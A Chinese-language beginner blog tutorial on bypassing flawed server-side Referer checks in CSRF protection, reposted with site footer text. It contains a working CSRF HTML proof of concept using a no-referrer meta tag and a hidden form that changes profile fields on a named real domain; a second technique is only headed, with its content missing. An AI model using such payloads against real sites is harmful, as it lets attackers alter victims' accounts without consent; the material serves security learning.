CSRF绕过后端Referer校验入门教程_csrf小白常识

CSRF绕过后端Referer校验分正常情况和不正常的情况,我们这里主要讨论开发在写校验referer程序时,不正常的情况下怎么进行绕过。正常情况正常的情况指服务器端校验Referer的代码没毛病,那么意味着前端是无法绕过的。我之前考虑过的方案:JS修改Referer,失败;请求恶意网页后,后端重新送包,问题是你怎么跨域拿Cookie,失败;不正常的情况不正

CSRF绕过后端Referer校验入门教程

CSRF绕过后端Referer校验分正常情况和不正常的情况,我们这里主要讨论开发在写校验referer程序时,不正常的情况下怎么进行绕过。

CSRF绕过后端Referer校验入门教程_csrf小白常识

正常情况

正常的情况指服务器端校验Referer的代码没毛病,那么意味着前端是无法绕过的。

我之前考虑过的方案:

  • JS修改Referer,失败;
  • 请求恶意网页后,后端重新送包,问题是你怎么跨域拿Cookie,失败;

不正常的情况

不正常的情况指服务器端校验Referer的代码有漏洞,前端才能做到绕过,下面介绍几个可能会绕过Referer的案例;

添加无Referer标签

<meta name=”referrer” content=”never”>

Copy<html>
  <meta name="referrer" content="never">
  <body>
  <script>history.pushState('', '', '/')</script>  <!-- 实现浏览器页面不刷新修改url链接 -->
    <form action="http://www.baidu.com/setProfile" method="POST">
      <input type="hidden" name="nickname" value="new22" />
      <input type="hidden" name="email" value="1@1.com" />
      <input type="hidden" name="team" value="new22" />
      <input type="hidden" name="address" value="new33" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

自建服务器路径带referer字段名

CSRF绕过后端Referer校验入门教程_csrf小白常识
如果文章对你有帮助,可以给文章评论、点推荐哦 

海计划公众号
(0)
上一篇 2020/03/20 07:33
下一篇 2020/03/20 07:33

您可能感兴趣的内容